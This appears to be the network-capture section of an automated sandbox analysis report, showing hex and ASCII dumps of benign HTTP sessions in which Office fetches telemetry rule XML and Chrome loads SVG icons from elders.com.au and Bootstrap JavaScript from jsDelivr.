                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            96192.168.2.45776913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                            x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052950Z-16547b76f7fcrtpchC1DFW52e8000000065000000000k6gy
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            97192.168.2.457770162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC658OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"967-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 7975
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210127-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1730248629.155532,VS0,VS0,VE4
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b02ca85e4770-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC786INData Raw: 39 36 37 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 39 20 37 2e 35 43 39 20 37 2e 33 36 37 33 39 20 39 2e 30 35 32 36 38 20 37 2e 32 34 30 32 31 20 39 2e 31 34 36 34 35 20 37 2e 31 34 36 34 35 43 39 2e 32 34 30 32 31 20 37 2e 30 35 32 36 38 20 39 2e 33 36 37 33 39 20 37 20 39 2e 35 20 37 48 31 37 2e 35 43 31 37 2e 36 33 32 36 20 37 20 31 37 2e 37 35 39 38 20 37
                                                                                                                                                                                                            Data Ascii: 967<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 39 20 31 36 2e 35 56 37 2e 35 43 31 39 20 37 2e 31 30 32 31 38 20 31 38 2e 38 34 32 20 36 2e 37 32 30 36 34 20 31 38 2e 35 36 30 37 20 36 2e 34 33 39 33 34 43 31 38 2e 32 37 39 34 20 36 2e 31 35 38 30 34 20 31 37 2e 38 39 37 38 20 36 20 31 37 2e 35 20 36 48 39 2e 35 43 39 2e 31 30 32 31 38 20 36 20 38 2e 37 32 30 36 34 20 36 2e 31 35 38 30 34 20 38 2e 34 33 39 33 34 20 36 2e 34 33 39 33 34 43 38 2e 31 35 38 30 34 20 36 2e 37 32 30 36 34 20 38 20 37 2e 31 30 32 31 38 20 38 20 37 2e 35 56 39 2e 35 43 38 20 39 2e 36 33 32 36 31 20 38 2e 30 35 32 36 38 20 39 2e 37 35 39 37 39 20 38 2e 31 34 36 34 35 20 39 2e 38 35 33 35 35 43 38 2e 32 34 30 32 31 20 39 2e 39 34 37 33 32 20 38 2e 33 36 37 33 39 20 31 30 20 38 2e 35 20 31 30 43 38 2e 36 33 32 36 31 20 31 30 20
                                                                                                                                                                                                            Data Ascii: 9 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9.94732 8.36739 10 8.5 10C8.63261 10
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC259INData Raw: 33 30 37 34 20 31 31 2e 31 34 36 20 31 35 2e 33 35 33 39 43 31 31 2e 31 39 32 35 20 31 35 2e 34 30 30 34 20 31 31 2e 32 34 37 37 20 31 35 2e 34 33 37 33 20 31 31 2e 33 30 38 34 20 31 35 2e 34 36 32 34 43 31 31 2e 33 36 39 32 20 31 35 2e 34 38 37 36 20 31 31 2e 34 33 34 33 20 31 35 2e 35 30 30 35 20 31 31 2e 35 20 31 35 2e 35 30 30 35 43 31 31 2e 35 36 35 37 20 31 35 2e 35 30 30 35 20 31 31 2e 36 33 30 38 20 31 35 2e 34 38 37 36 20 31 31 2e 36 39 31 36 20 31 35 2e 34 36 32 34 43 31 31 2e 37 35 32 33 20 31 35 2e 34 33 37 33 20 31 31 2e 38 30 37 35 20 31 35 2e 34 30 30 34 20 31 31 2e 38 35 34 20 31 35 2e 33 35 33 39 4c 31 34 2e 38 35 34 20 31 32 2e 33 35 33 39 56 31 32 2e 33 35 33 39 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67
                                                                                                                                                                                                            Data Ascii: 3074 11.146 15.3539C11.1925 15.4004 11.2477 15.4373 11.3084 15.4624C11.3692 15.4876 11.4343 15.5005 11.5 15.5005C11.5657 15.5005 11.6308 15.4876 11.6916 15.4624C11.7523 15.4373 11.8075 15.4004 11.854 15.3539L14.854 12.3539V12.3539Z" fill="#D21E24"/></svg
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            98192.168.2.457771172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC421OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"d3-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc10076-SJC
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1730615153.646395,VS0,VS0,VE1
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 18504
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b02cbc32e7bb-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 68 2d 36 20 77 2d 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 3e 0a 20 20 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 31 39 20 39 6c 2d 37 20 37 2d 37 2d 37 22 20 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"> <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" /></svg>
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            99192.168.2.457774151.101.129.2294432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC390OUTGET /npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                                                            Host: cdn.jsdelivr.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 61893
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Expose-Headers: *
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                            X-JSD-Version: 5.0.0-beta3
                                                                                                                                                                                                            X-JSD-Version-Type: version
                                                                                                                                                                                                            ETag: W/"f1c5-lhuikqyMaMc4OVbHy82SnK9kvSQ"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Age: 363227
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            X-Served-By: cache-fra-etou8220143-FRA, cache-dfw-ktki8620060-DFW
                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 30 2d 62 65 74 61 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                                                                                                                                                            Data Ascii: /*! * Bootstrap v5.0.0-beta3 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 3b 63 6f 6e 73 74 20 69 3d 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 65 29 2c 6e 3d 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 73 29 3b 72 65 74 75 72 6e 20 69 7c 7c 6e 3f 28 65 3d 65 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 73 3d 73 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 31 65 33 2a 28 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 65 29 2b 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 73 29 29 29 3a 30 7d 2c 6c 3d 74 3d 3e 7b 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 29 7d 2c 63 3d 74 3d 3e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 2c 68 3d 28 74 2c 65 29 3d 3e 7b 6c 65 74 20 73 3d 21 31 3b 63 6f 6e 73 74 20 69
                                                                                                                                                                                                            Data Ascii: ;const i=Number.parseFloat(e),n=Number.parseFloat(s);return i||n?(e=e.split(",")[0],s=s.split(",")[0],1e3*(Number.parseFloat(e)+Number.parseFloat(s))):0},l=t=>{t.dispatchEvent(new Event("transitionend"))},c=t=>(t[0]||t).nodeType,h=(t,e)=>{let s=!1;const i
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 6d 65 6e 74 2e 62 6f 64 79 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 6e 6f 2d 6a 71 75 65 72 79 22 29 3f 74 3a 6e 75 6c 6c 7d 2c 62 3d 28 29 3d 3e 22 72 74 6c 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 69 72 2c 76 3d 28 74 2c 65 29 3d 3e 7b 76 61 72 20 73 3b 73 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 5f 28 29 3b 69 66 28 73 29 7b 63 6f 6e 73 74 20 69 3d 73 2e 66 6e 5b 74 5d 3b 73 2e 66 6e 5b 74 5d 3d 65 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 73 2e 66 6e 5b 74 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 73 2e 66 6e 5b 74 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 28 29 3d 3e 28 73 2e 66 6e 5b 74 5d 3d 69 2c 65 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 29 7d 7d 2c
                                                                                                                                                                                                            Data Ascii: ment.body.hasAttribute("data-bs-no-jquery")?t:null},b=()=>"rtl"===document.documentElement.dir,v=(t,e)=>{var s;s=()=>{const s=_();if(s){const i=s.fn[t];s.fn[t]=e.jQueryInterface,s.fn[t].Constructor=e,s.fn[t].noConflict=()=>(s.fn[t]=i,e.jQueryInterface)}},
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 26 26 60 24 7b 65 7d 3a 3a 24 7b 6b 2b 2b 7d 60 7c 7c 74 2e 75 69 64 45 76 65 6e 74 7c 7c 6b 2b 2b 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 53 28 74 29 3b 72 65 74 75 72 6e 20 74 2e 75 69 64 45 76 65 6e 74 3d 65 2c 4c 5b 65 5d 3d 4c 5b 65 5d 7c 7c 7b 7d 2c 4c 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 74 2c 65 2c 73 3d 6e 75 6c 6c 29 7b 63 6f 6e 73 74 20 69 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 2c 6f 3d 69 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 2b 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 69 5b 6e 5d 5d 3b 69 66 28 6f 2e 6f 72 69 67 69 6e 61 6c 48 61 6e 64 6c 65 72 3d 3d 3d 65 26 26 6f 2e 64 65 6c 65 67 61 74 69 6f 6e 53 65 6c 65 63 74 6f 72 3d 3d
                                                                                                                                                                                                            Data Ascii: t,e){return e&&`${e}::${k++}`||t.uidEvent||k++}function N(t){const e=S(t);return t.uidEvent=e,L[e]=L[e]||{},L[e]}function O(t,e,s=null){const i=Object.keys(t);for(let n=0,o=i.length;n<o;n++){const o=t[i[n]];if(o.originalHandler===e&&o.delegationSelector==
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 6a 28 74 2c 6c 2c 72 2c 6f 2c 6e 3f 73 3a 6e 75 6c 6c 29 7d 63 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 29 2e 66 6f 72 45 61 63 68 28 73 3d 3e 7b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 73 2c 69 29 7b 63 6f 6e 73 74 20 6e 3d 65 5b 73 5d 7c 7c 7b 7d 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 66 6f 72 45 61 63 68 28 6f 3d 3e 7b 69 66 28 6f 2e 69 6e 63 6c 75 64 65 73 28 69 29 29 7b 63 6f 6e 73 74 20 69 3d 6e 5b 6f 5d 3b 6a 28 74 2c 65 2c 73 2c 69 2e 6f 72 69 67 69 6e 61 6c 48 61 6e 64 6c 65 72 2c 69 2e 64 65 6c 65 67 61 74 69 6f 6e 53 65 6c 65 63 74 6f 72 29 7d 7d 29 7d 28 74 2c 6c 2c 73 2c 65 2e 73 6c 69 63 65 28 31 29 29 7d 29 3b 63 6f 6e 73 74 20 68 3d 6c 5b 72 5d 7c 7c 7b 7d 3b 4f 62 6a 65
                                                                                                                                                                                                            Data Ascii: eturn;return void j(t,l,r,o,n?s:null)}c&&Object.keys(l).forEach(s=>{!function(t,e,s,i){const n=e[s]||{};Object.keys(n).forEach(o=>{if(o.includes(i)){const i=n[o];j(t,e,s,i.originalHandler,i.delegationSelector)}})}(t,l,s,e.slice(1))});const h=l[r]||{};Obje
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 43 6c 6f 73 65 45 76 65 6e 74 28 65 29 3b 6e 75 6c 6c 3d 3d 3d 73 7c 7c 73 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 28 74 29 7b 72 65 74 75 72 6e 20 72 28 74 29 7c 7c 74 2e 63 6c 6f 73 65 73 74 28 22 2e 61 6c 65 72 74 22 29 7d 5f 74 72 69 67 67 65 72 43 6c 6f 73 65 45 76 65 6e 74 28 74 29 7b 72 65 74 75 72 6e 20 50 2e 74 72 69 67 67 65 72 28 74 2c 22 63 6c 6f 73 65 2e 62 73 2e 61 6c 65 72 74 22 29 7d 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 74 29 7b 69 66 28 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 73 68 6f 77 22 29 2c 21 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f
                                                                                                                                                                                                            Data Ascii: =this._triggerCloseEvent(e);null===s||s.defaultPrevented||this._removeElement(e)}_getRootElement(t){return r(t)||t.closest(".alert")}_triggerCloseEvent(t){return P.trigger(t,"close.bs.alert")}_removeElement(t){if(t.classList.remove("show"),!t.classList.co
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 6f 6e 22 5d 27 29 3b 6c 65 74 20 73 3d 77 2e 67 65 74 28 65 2c 22 62 73 2e 62 75 74 74 6f 6e 22 29 3b 73 7c 7c 28 73 3d 6e 65 77 20 52 28 65 29 29 2c 73 2e 74 6f 67 67 6c 65 28 29 7d 29 2c 76 28 22 62 75 74 74 6f 6e 22 2c 52 29 3b 63 6f 6e 73 74 20 24 3d 7b 73 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 28 74 2c 65 2c 73 29 7b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 22 2b 57 28 65 29 2c 73 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 41 74 74 72 69 62 75 74 65 28 74 2c 65 29 7b 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 22 2b 57 28 65 29 29 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 73 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 7b 7d 3b 63 6f 6e 73 74 20 65 3d 7b 7d 3b 72 65
                                                                                                                                                                                                            Data Ascii: on"]');let s=w.get(e,"bs.button");s||(s=new R(e)),s.toggle()}),v("button",R);const $={setDataAttribute(t,e,s){t.setAttribute("data-bs-"+W(e),s)},removeDataAttribute(t,e){t.removeAttribute("data-bs-"+W(e))},getDataAttributes(t){if(!t)return{};const e={};re
